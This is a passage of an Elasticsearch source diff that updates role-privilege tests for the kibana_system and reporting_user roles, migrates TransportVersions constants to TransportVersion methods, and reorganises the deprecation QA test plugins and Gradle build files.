assertThat(bitSet, notNullValue()); } + cache.verifyInternalConsistency(); assertThat(cache.entryCount(), not(equalTo(0))); assertThat(cache.ramBytesUsed(), not(equalTo(0L))); }); + cache.verifyInternalConsistency(); + + // closing an index results in the associated entries being removed from the cache (at least when single threaded) assertThat(cache.entryCount(), equalTo(0)); assertThat(cache.ramBytesUsed(), equalTo(0L)); } @@ -650,7 +594,7 @@ private void runTestOnIndices(int numberIndices, CheckedConsumer { + final IndexAbstraction indexAbstraction = mockIndexAbstraction(indexName); + assertThat(kibanaRole.indices().allowedIndicesMatcher("indices:foo").test(indexAbstraction), is(false)); + assertThat(kibanaRole.indices().allowedIndicesMatcher("indices:bar").test(indexAbstraction), is(false)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportDeleteIndexAction.TYPE.name()).test(indexAbstraction), is(true)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(GetIndexAction.NAME).test(indexAbstraction), is(true)); + assertThat( + 
kibanaRole.indices().allowedIndicesMatcher(TransportCreateIndexAction.TYPE.name()).test(indexAbstraction), + is(false) + ); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportIndexAction.NAME).test(indexAbstraction), is(false)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportDeleteAction.NAME).test(indexAbstraction), is(false)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportSearchAction.TYPE.name()).test(indexAbstraction), is(true)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportMultiSearchAction.TYPE.name()).test(indexAbstraction), is(true)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportGetAction.TYPE.name()).test(indexAbstraction), is(true)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(READ_CROSS_CLUSTER_NAME).test(indexAbstraction), is(false)); + assertThat( + kibanaRole.indices().allowedIndicesMatcher(TransportUpdateSettingsAction.TYPE.name()).test(indexAbstraction), + is(true) + ); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportPutMappingAction.TYPE.name()).test(indexAbstraction), is(true)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(RolloverAction.NAME).test(indexAbstraction), is(true)); + // Implied by the overall view_index_metadata and monitor privilege + assertViewIndexMetadata(kibanaRole, indexName); + assertThat(kibanaRole.indices().allowedIndicesMatcher("indices:monitor/").test(indexAbstraction), is(true)); + }); Arrays.asList( @@ -1877,6 +1913,48 @@ public void testKibanaSystemRole() { assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportPutMappingAction.TYPE.name()).test(indexAbstraction), is(true)); assertThat(kibanaRole.indices().allowedIndicesMatcher(RolloverAction.NAME).test(indexAbstraction), is(true)); }); + + // Tests for third-party agent indices (ExtraHop, QualysGAV, SentinelOne) that `kibana_system` has full management access to + // This includes read, write, create, delete, and all ILM-related management actions. 
+ Arrays.asList( + "logs-extrahop.investigation-" + randomAlphaOfLength(randomIntBetween(1, 10)), + "logs-qualys_gav.asset-" + randomAlphaOfLength(randomIntBetween(1, 10)), + "logs-sentinel_one.application-" + randomAlphaOfLength(randomIntBetween(1, 10)) + ).forEach((indexName) -> { + final IndexAbstraction indexAbstraction = mockIndexAbstraction(indexName); + + // Assert Read Actions (Allowed by "read") + assertThat(kibanaRole.indices().allowedIndicesMatcher(GetIndexAction.NAME).test(indexAbstraction), is(true)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportSearchAction.TYPE.name()).test(indexAbstraction), is(true)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportGetAction.TYPE.name()).test(indexAbstraction), is(true)); + + // Assert Write & Delete Document Actions (Allowed by "write", "index", "delete") + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportIndexAction.NAME).test(indexAbstraction), is(true)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportDeleteAction.NAME).test(indexAbstraction), is(true)); + // The "update" action is also implicitly part of "write" + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportUpdateAction.NAME).test(indexAbstraction), is(true)); + + // Assert Index Management Actions (Allowed by "create_index", "delete_index", and "manage") + // Allowed by the explicit "create_index" privilege + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportCreateIndexAction.TYPE.name()).test(indexAbstraction), is(true)); + // Allowed by the explicit TransportDeleteIndexAction + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportDeleteIndexAction.TYPE.name()).test(indexAbstraction), is(true)); + + // Allowed due to the "manage" privilege and explicit TransportAutoPutMappingAction + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportPutMappingAction.TYPE.name()).test(indexAbstraction), is(true)); + // Allowed due to the explicit TransportIndicesAliasesAction + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportIndicesAliasesAction.NAME).test(indexAbstraction), is(true)); + // Rollover requires 'manage' on the alias and 'create_index', both of which are granted.
+ assertThat(kibanaRole.indices().allowedIndicesMatcher(RolloverAction.NAME).test(indexAbstraction), is(true)); + + // Assert Denied Actions + // This role should not have cross-cluster permissions on these indices + assertThat(kibanaRole.indices().allowedIndicesMatcher(READ_CROSS_CLUSTER_NAME).test(indexAbstraction), is(false)); + + // A check against a completely different index should fail + final IndexAbstraction otherIndex = mockIndexAbstraction("some-unrelated-index"); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportSearchAction.TYPE.name()).test(otherIndex), is(false)); + }); } public void testKibanaAdminRole() { @@ -2687,20 +2765,11 @@ public void testReportingUserRole() { RoleDescriptor roleDescriptor = ReservedRolesStore.roleDescriptor("reporting_user"); assertNotNull(roleDescriptor); assertThat(roleDescriptor.getMetadata(), hasEntry("_reserved", true)); + assertThat(roleDescriptor.getMetadata(), hasEntry("_deprecated", true)); final String applicationName = "kibana-.kibana"; - final Set applicationPrivilegeNames = Set.of( - "feature_discover.minimal_read", - "feature_discover.generate_report", - "feature_dashboard.minimal_read", - "feature_dashboard.generate_report", - "feature_dashboard.download_csv_report", - "feature_canvas.minimal_read", - "feature_canvas.generate_report", - "feature_visualize.minimal_read", - "feature_visualize.generate_report" - ); + final Set applicationPrivilegeNames = Set.of("reserved_reporting_user"); final Set allowedApplicationActionPatterns = Set.of( "login:", diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/termsenum/TransportTermsEnumActionTests.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/termsenum/TransportTermsEnumActionTests.java index 975d08eb45277..e2e667be587a2 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/termsenum/TransportTermsEnumActionTests.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/termsenum/TransportTermsEnumActionTests.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.termsenum; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.TimeValue; @@ -67,11 +66,11 @@ public void onFailure(final Exception e) { /** * Test that triggering the CCS compatibility check with a query that shouldn't go to the minor before - * TransportVersions.MINIMUM_CCS_VERSION works + * TransportVersion.minimumCCSVersion() works */ public void testCCSCheckCompatibility() throws Exception { TermsEnumRequest request = new TermsEnumRequest().field("field").timeout(TimeValue.timeValueSeconds(5)); - TransportVersion version = TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_CCS_VERSION, true); + TransportVersion version = TransportVersionUtils.getNextVersion(TransportVersion.minimumCCSVersion(), true); request.indexFilter(new DummyQueryBuilder() { @Override public TransportVersion getMinimalSupportedVersion() { diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/transform/MockDeprecatedAggregationBuilder.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/transform/MockDeprecatedAggregationBuilder.java index 8b5806a869c8e..d0903077a08f8 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/transform/MockDeprecatedAggregationBuilder.java +++ 
b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/transform/MockDeprecatedAggregationBuilder.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.transform; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.logging.DeprecationCategory; @@ -99,6 +98,6 @@ public static MockDeprecatedAggregationBuilder fromXContent(XContentParser p) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/transform/MockDeprecatedQueryBuilder.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/transform/MockDeprecatedQueryBuilder.java index 145263beb0eb3..a3e447fafcf6b 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/transform/MockDeprecatedQueryBuilder.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/transform/MockDeprecatedQueryBuilder.java @@ -9,7 +9,6 @@ import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -88,6 +87,6 @@ protected int doHashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/core/template-resources/src/main/resources/kibana-reporting@template.json b/x-pack/plugin/core/template-resources/src/main/resources/kibana-reporting@template.json index 109979208c496..74256872aa0cf 100644 --- a/x-pack/plugin/core/template-resources/src/main/resources/kibana-reporting@template.json +++ b/x-pack/plugin/core/template-resources/src/main/resources/kibana-reporting@template.json @@ -10,6 +10,9 @@ "template": { "lifecycle": {}, "mappings": { + "_meta": { + "template_version": ${xpack.stack.template.version} + }, "properties": { "meta": { "properties": { diff --git a/x-pack/plugin/deprecation/qa/build.gradle b/x-pack/plugin/deprecation/qa/build.gradle index e69de29bb2d1d..49af65e680d62 100644 --- a/x-pack/plugin/deprecation/qa/build.gradle +++ b/x-pack/plugin/deprecation/qa/build.gradle @@ -0,0 +1,41 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. 
+ */ + +apply plugin: 'elasticsearch.internal-java-rest-test' +// Necessary to use tests in Serverless +apply plugin: 'elasticsearch.internal-test-artifact' + +dependencies { + javaRestTestImplementation project(path: ':x-pack:plugin:deprecation:qa:common') + javaRestTestImplementation("com.fasterxml.jackson.core:jackson-annotations:${versions.jackson}") + javaRestTestImplementation("com.fasterxml.jackson.core:jackson-databind:${versions.jackson}") + + clusterModules project(':x-pack:plugin:deprecation:qa:early-deprecation-plugin') + clusterModules project(':x-pack:plugin:deprecation:qa:deprecation-plugin') + clusterModules project(':modules:ingest-common') + clusterModules project(':modules:mapper-extras') + clusterModules project(':modules:data-streams') + clusterModules project(xpackModule('stack')) + clusterModules project(xpackModule('deprecation')) + clusterModules project(xpackModule('ilm')) + clusterModules project(xpackModule('ml')) + clusterModules project(xpackModule('mapper-constant-keyword')) + clusterModules project(xpackModule('wildcard')) + clusterModules project(xpackModule('transform')) +} + +restResources { + restApi { + include '_common', 'indices', 'index' + } +} + +// Test clusters run with security disabled +tasks.named("javaRestTest") { + buildParams.withFipsEnabledOnly(it) +} + diff --git a/x-pack/plugin/deprecation/qa/common/src/main/java/org/elasticsearch/xpack/deprecation/DeprecationSettings.java b/x-pack/plugin/deprecation/qa/common/src/main/java/org/elasticsearch/xpack/deprecation/DeprecationSettings.java new file mode 100644 index 0000000000000..b6b1e8262f812 --- /dev/null +++ b/x-pack/plugin/deprecation/qa/common/src/main/java/org/elasticsearch/xpack/deprecation/DeprecationSettings.java @@ -0,0 +1,46 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.deprecation; + +import org.elasticsearch.common.settings.Setting; + +public class DeprecationSettings { + public static final Setting TEST_DEPRECATED_SETTING_TRUE1 = Setting.boolSetting( + "test.setting.deprecated.true1", + true, + Setting.Property.NodeScope, + Setting.Property.DeprecatedWarning, + Setting.Property.Dynamic + ); + public static final Setting TEST_DEPRECATED_SETTING_TRUE2 = Setting.boolSetting( + "test.setting.deprecated.true2", + true, + Setting.Property.NodeScope, + Setting.Property.DeprecatedWarning, + Setting.Property.Dynamic + ); + public static final Setting TEST_DEPRECATED_SETTING_TRUE3 = Setting.boolSetting( + "test.setting.deprecated.true3", + true, + Setting.Property.NodeScope, + Setting.Property.Deprecated, + Setting.Property.Dynamic + ); + public static final Setting TEST_NOT_DEPRECATED_SETTING = Setting.boolSetting( + "test.setting.not_deprecated", + false, + Setting.Property.NodeScope, + Setting.Property.Dynamic + ); + + public static final String DEPRECATED_ENDPOINT = "[/_test_cluster/deprecated_settings] exists for deprecated tests"; + public static final String DEPRECATED_USAGE = "[deprecated_settings] usage is deprecated.
use [settings] instead"; + public static final String DEPRECATED_WARN_USAGE = + "[deprecated_warn_settings] usage is deprecated but won't be breaking in next version"; + public static final String COMPATIBLE_API_USAGE = "You are using a compatible API for this request"; +} diff --git a/x-pack/plugin/deprecation/qa/deprecation-plugin/build.gradle b/x-pack/plugin/deprecation/qa/deprecation-plugin/build.gradle new file mode 100644 index 0000000000000..cf4546dd06e03 --- /dev/null +++ b/x-pack/plugin/deprecation/qa/deprecation-plugin/build.gradle @@ -0,0 +1,20 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +apply plugin: 'elasticsearch.base-internal-es-plugin' +apply plugin: 'elasticsearch.build' + +esplugin { + name = 'deprecation-plugin' + description = 'Deprecated query plugin' + classname ='org.elasticsearch.xpack.deprecation.plugin.TestDeprecationPlugin' +} + +dependencies { + compileOnly project(":server") + implementation project(':x-pack:plugin:deprecation:qa::common') +} diff --git a/x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecatedQueryBuilder.java b/x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecatedQueryBuilder.java similarity index 95% rename from x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecatedQueryBuilder.java rename to x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecatedQueryBuilder.java index 205a699d23593..c486d1d3a8457 100644 --- a/x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecatedQueryBuilder.java +++ b/x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecatedQueryBuilder.java @@ -5,11 +5,10 @@ * 2.0. 
*/ -package org.elasticsearch.xpack.deprecation; +package org.elasticsearch.xpack.deprecation.plugin; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -92,6 +91,6 @@ protected boolean doEquals(TestDeprecatedQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecationHeaderRestAction.java b/x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecationHeaderRestAction.java similarity index 79% rename from x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecationHeaderRestAction.java rename to x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecationHeaderRestAction.java index 2b9d9b0875220..797a9fbb8a238 100644 --- a/x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecationHeaderRestAction.java +++ b/x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecationHeaderRestAction.java @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -package org.elasticsearch.xpack.deprecation; +package org.elasticsearch.xpack.deprecation.plugin; import org.elasticsearch.client.internal.node.NodeClient; import org.elasticsearch.common.logging.DeprecationCategory; @@ -26,6 +26,14 @@ import static org.elasticsearch.rest.RestRequest.Method.GET; import static org.elasticsearch.rest.RestRequest.Method.POST; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.COMPATIBLE_API_USAGE; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.DEPRECATED_ENDPOINT; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.DEPRECATED_USAGE; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.DEPRECATED_WARN_USAGE; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_DEPRECATED_SETTING_TRUE1; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_DEPRECATED_SETTING_TRUE2; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_DEPRECATED_SETTING_TRUE3; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_NOT_DEPRECATED_SETTING; /** * Enables testing {@code DeprecationRestHandler} via integration tests by guaranteeing a deprecated REST endpoint. 
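
The guarantee described in that javadoc rests on the handler logging a deprecation on every call to its route. A minimal sketch of the mechanism, assuming the wiring into the handler body (the logger field and the message constants come from elsewhere in this diff):

    private static final DeprecationLogger deprecationLogger = DeprecationLogger.getLogger(TestDeprecationHeaderRestAction.class);

    // invoked while handling a request to /_test_cluster/deprecated_settings
    void logDeprecatedUsage() {
        deprecationLogger.warn(DeprecationCategory.API, "deprecated_settings", DEPRECATED_USAGE);
    }

The warning surfaces as a Warning response header and, with cluster.deprecation_indexing.enabled set, as an indexed deprecation document, which is what the IT classes below assert on.
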
@@ -36,34 +44,6 @@ public class TestDeprecationHeaderRestAction extends BaseRestHandler { private static final DeprecationLogger deprecationLogger = DeprecationLogger.getLogger(TestDeprecationHeaderRestAction.class); - public static final Setting TEST_DEPRECATED_SETTING_TRUE1 = Setting.boolSetting( - "test.setting.deprecated.true1", - true, - Setting.Property.NodeScope, - Setting.Property.DeprecatedWarning, - Setting.Property.Dynamic - ); - public static final Setting TEST_DEPRECATED_SETTING_TRUE2 = Setting.boolSetting( - "test.setting.deprecated.true2", - true, - Setting.Property.NodeScope, - Setting.Property.DeprecatedWarning, - Setting.Property.Dynamic - ); - public static final Setting TEST_DEPRECATED_SETTING_TRUE3 = Setting.boolSetting( - "test.setting.deprecated.true3", - true, - Setting.Property.NodeScope, - Setting.Property.Deprecated, - Setting.Property.Dynamic - ); - public static final Setting TEST_NOT_DEPRECATED_SETTING = Setting.boolSetting( - "test.setting.not_deprecated", - false, - Setting.Property.NodeScope, - Setting.Property.Dynamic - ); - private static final Map> SETTINGS_MAP = Map.of( TEST_DEPRECATED_SETTING_TRUE1.getKey(), TEST_DEPRECATED_SETTING_TRUE1, @@ -75,12 +55,6 @@ public class TestDeprecationHeaderRestAction extends BaseRestHandler { TEST_NOT_DEPRECATED_SETTING ); - public static final String DEPRECATED_ENDPOINT = "[/_test_cluster/deprecated_settings] exists for deprecated tests"; - public static final String DEPRECATED_USAGE = "[deprecated_settings] usage is deprecated. use [settings] instead"; - public static final String DEPRECATED_WARN_USAGE = - "[deprecated_warn_settings] usage is deprecated but won't be breaking in next version"; - public static final String COMPATIBLE_API_USAGE = "You are using a compatible API for this request"; - private final Settings settings; public TestDeprecationHeaderRestAction(Settings settings) { diff --git a/x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecationPlugin.java b/x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecationPlugin.java similarity index 82% rename from x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecationPlugin.java rename to x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecationPlugin.java index 3867e02ac6ca7..ca8119268dbc5 100644 --- a/x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecationPlugin.java +++ b/x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecationPlugin.java @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. 
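
Centralizing these constants in the shared qa common project means the plugin and the REST tests compile against the same strings, so an assertion like the following sketch (built from helpers that appear in DeprecationHttpIT later in this diff; static imports elided) cannot drift from what the handler actually emits:

    List<String> warnings = extractWarningValuesFromWarningHeaders(getWarningHeaders(response.getHeaders()));
    assertThat(warnings, hasItem(DEPRECATED_USAGE));
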
*/ -package org.elasticsearch.xpack.deprecation; +package org.elasticsearch.xpack.deprecation.plugin; import org.elasticsearch.cluster.metadata.IndexNameExpressionResolver; import org.elasticsearch.cluster.node.DiscoveryNodes; @@ -28,6 +28,9 @@ import java.util.function.Supplier; import static java.util.Collections.singletonList; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_DEPRECATED_SETTING_TRUE1; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_DEPRECATED_SETTING_TRUE2; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_NOT_DEPRECATED_SETTING; /** * Adds {@link TestDeprecationHeaderRestAction} for testing deprecation requests via HTTP. @@ -51,11 +54,7 @@ public List getRestHandlers( @Override public List> getSettings() { - return Arrays.asList( - TestDeprecationHeaderRestAction.TEST_DEPRECATED_SETTING_TRUE1, - TestDeprecationHeaderRestAction.TEST_DEPRECATED_SETTING_TRUE2, - TestDeprecationHeaderRestAction.TEST_NOT_DEPRECATED_SETTING - ); + return Arrays.asList(TEST_DEPRECATED_SETTING_TRUE1, TEST_DEPRECATED_SETTING_TRUE2, TEST_NOT_DEPRECATED_SETTING); } @Override diff --git a/x-pack/plugin/deprecation/qa/early-deprecation-plugin/build.gradle b/x-pack/plugin/deprecation/qa/early-deprecation-plugin/build.gradle new file mode 100644 index 0000000000000..e1faa524b7f34 --- /dev/null +++ b/x-pack/plugin/deprecation/qa/early-deprecation-plugin/build.gradle @@ -0,0 +1,22 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +apply plugin: 'elasticsearch.base-internal-es-plugin' +apply plugin: 'elasticsearch.build' + +esplugin { + name = 'early-deprecation-plugin' + description = 'Deprecated query plugin' + classname = 'org.elasticsearch.xpack.deprecation.earlyplugin.EarlyDeprecationTestPlugin' +} + +dependencies { + compileOnly project(":server") +} +tasks.named("javadoc").configure { + enabled = false +} diff --git a/x-pack/plugin/deprecation/qa/early-deprecation-rest/src/main/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationTestPlugin.java b/x-pack/plugin/deprecation/qa/early-deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/earlyplugin/EarlyDeprecationTestPlugin.java similarity index 94% rename from x-pack/plugin/deprecation/qa/early-deprecation-rest/src/main/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationTestPlugin.java rename to x-pack/plugin/deprecation/qa/early-deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/earlyplugin/EarlyDeprecationTestPlugin.java index e8c04ab68c901..3e189ed1e379f 100644 --- a/x-pack/plugin/deprecation/qa/early-deprecation-rest/src/main/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationTestPlugin.java +++ b/x-pack/plugin/deprecation/qa/early-deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/earlyplugin/EarlyDeprecationTestPlugin.java @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. 
*/ -package org.elasticsearch.xpack.deprecation; +package org.elasticsearch.xpack.deprecation.earlyplugin; import org.elasticsearch.common.logging.DeprecationCategory; import org.elasticsearch.common.logging.DeprecationLogger; diff --git a/x-pack/plugin/deprecation/qa/early-deprecation-rest/build.gradle b/x-pack/plugin/deprecation/qa/early-deprecation-rest/build.gradle deleted file mode 100644 index 2fe46efca8a1c..0000000000000 --- a/x-pack/plugin/deprecation/qa/early-deprecation-rest/build.gradle +++ /dev/null @@ -1,48 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import org.elasticsearch.gradle.util.GradleUtils - -apply plugin: 'elasticsearch.base-internal-es-plugin' -apply plugin: 'elasticsearch.legacy-java-rest-test' - -esplugin { - description = 'Deprecated query plugin' - classname ='org.elasticsearch.xpack.deprecation.EarlyDeprecationTestPlugin' -} - -dependencies { - javaRestTestImplementation project(path: ':x-pack:plugin:deprecation:qa:common') - - javaRestTestImplementation("com.fasterxml.jackson.core:jackson-annotations:${versions.jackson}") - javaRestTestImplementation("com.fasterxml.jackson.core:jackson-databind:${versions.jackson}") -} - -// let the javaRestTest see the classpath of main -GradleUtils.extendSourceSet(project, "main", "javaRestTest", tasks.named("javaRestTest")) - -restResources { - restApi { - include '_common', 'indices', 'index' - } -} - -testClusters.configureEach { - testDistribution = 'DEFAULT' - setting 'xpack.security.enabled', 'false' - setting 'xpack.license.self_generated.type', 'trial' - setting 'cluster.deprecation_indexing.enabled', 'true' - setting 'cluster.deprecation_indexing.flush_interval', '1ms' - setting 'logger.org.elasticsearch.xpack.deprecation','TRACE' - setting 'logger.org.elasticsearch.xpack.deprecation.logging','TRACE' -} - -// Test clusters run with security disabled -tasks.named("javaRestTest") { - buildParams.withFipsEnabledOnly(it) -} - diff --git a/x-pack/plugin/deprecation/qa/rest/build.gradle b/x-pack/plugin/deprecation/qa/rest/build.gradle deleted file mode 100644 index e3ad5799aaf75..0000000000000 --- a/x-pack/plugin/deprecation/qa/rest/build.gradle +++ /dev/null @@ -1,44 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. 
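
For the early-deprecation case the plugin has to log before index templates can possibly exist. A rough sketch of its shape, assuming the ClusterPlugin#onNodeStarted hook and an illustrative message (the javadoc on EarlyDeprecationIndexingIT below describes the intent):

    public class EarlyDeprecationTestPlugin extends Plugin implements ClusterPlugin {
        private static final DeprecationLogger deprecationLogger = DeprecationLogger.getLogger(EarlyDeprecationTestPlugin.class);

        @Override
        public void onNodeStarted() {
            // fires before the deprecation-indexing templates are guaranteed to be installed
            deprecationLogger.warn(DeprecationCategory.OTHER, "early_deprecation", "simulated early deprecation at node startup");
        }
    }
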
- */ - -import org.elasticsearch.gradle.util.GradleUtils - -apply plugin: 'elasticsearch.base-internal-es-plugin' -apply plugin: 'elasticsearch.legacy-java-rest-test' - -esplugin { - description = 'Deprecated query plugin' - classname ='org.elasticsearch.xpack.deprecation.TestDeprecationPlugin' -} - -dependencies { - javaRestTestImplementation project(path: ':x-pack:plugin:deprecation:qa:common') - javaRestTestImplementation("com.fasterxml.jackson.core:jackson-annotations:${versions.jackson}") - javaRestTestImplementation("com.fasterxml.jackson.core:jackson-databind:${versions.jackson}") -} - -// let the javaRestTest see the classpath of main -GradleUtils.extendSourceSet(project, "main", "javaRestTest", tasks.named("javaRestTest")) - -restResources { - restApi { - include '_common', 'indices', 'index' - } -} - -testClusters.configureEach { - testDistribution = 'DEFAULT' - setting 'cluster.deprecation_indexing.enabled', 'true' - setting 'cluster.deprecation_indexing.flush_interval', '100ms' - setting 'xpack.security.enabled', 'false' - setting 'xpack.license.self_generated.type', 'trial' -} - -// Test clusters run with security disabled -tasks.named("javaRestTest") { - buildParams.withFipsEnabledOnly(it) -} diff --git a/x-pack/plugin/deprecation/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/DeprecationHttpIT.java b/x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/DeprecationHttpIT.java similarity index 95% rename from x-pack/plugin/deprecation/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/DeprecationHttpIT.java rename to x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/DeprecationHttpIT.java index 57bda3b35a1ad..df17c779a15df 100644 --- a/x-pack/plugin/deprecation/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/DeprecationHttpIT.java +++ b/x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/DeprecationHttpIT.java @@ -25,11 +25,13 @@ import org.elasticsearch.common.settings.Setting; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.RestApiVersion; +import org.elasticsearch.test.cluster.ElasticsearchCluster; import org.elasticsearch.test.rest.ESRestTestCase; import org.elasticsearch.xcontent.XContentBuilder; import org.elasticsearch.xcontent.json.JsonXContent; import org.hamcrest.Matcher; import org.junit.Before; +import 